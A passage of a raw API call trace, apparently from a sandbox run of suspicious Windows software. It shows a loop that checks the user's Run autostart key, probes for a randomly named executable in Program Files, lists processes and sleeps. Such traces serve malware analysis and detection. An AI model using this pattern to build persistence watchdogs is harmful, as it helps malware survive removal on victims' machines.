Interval=0xdea74*=-50000000) returned 0x0 [0303.410] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.411] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.411] NtClose (Handle=0x374) returned 0x0 [0303.411] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.411] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.412] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540a58) returned 1 [0303.412] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.412] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.412] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540b90) returned 1 [0303.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.423] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.431] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.432] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.433] NtClose (Handle=0x374) returned 0x0 [0303.433] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.433] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.433] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.433] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.433] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.433] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.449] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.472] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.474] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.474] NtClose (Handle=0x374) returned 0x0 [0303.474] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.474] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.474] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x541008) returned 1 [0303.474] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.474] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.475] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5410d8) returned 1 [0303.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.488] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.545] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.558] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.558] NtClose (Handle=0x374) returned 0x0 [0303.558] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.558] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.558] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540b90) returned 1 [0303.558] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.558] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.558] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540b90) returned 1 [0303.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.570] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.571] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.571] NtClose (Handle=0x374) returned 0x0 [0303.571] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.571] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.572] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540ac0) returned 1 [0303.572] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.572] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.572] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.591] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.594] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.596] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.596] NtClose (Handle=0x374) returned 0x0 [0303.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.596] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.596] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540a58) returned 1 [0303.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.596] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.596] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.612] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.613] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.613] NtClose (Handle=0x374) returned 0x0 [0303.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.613] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.614] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540f38) returned 1 [0303.614] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.614] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.614] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, 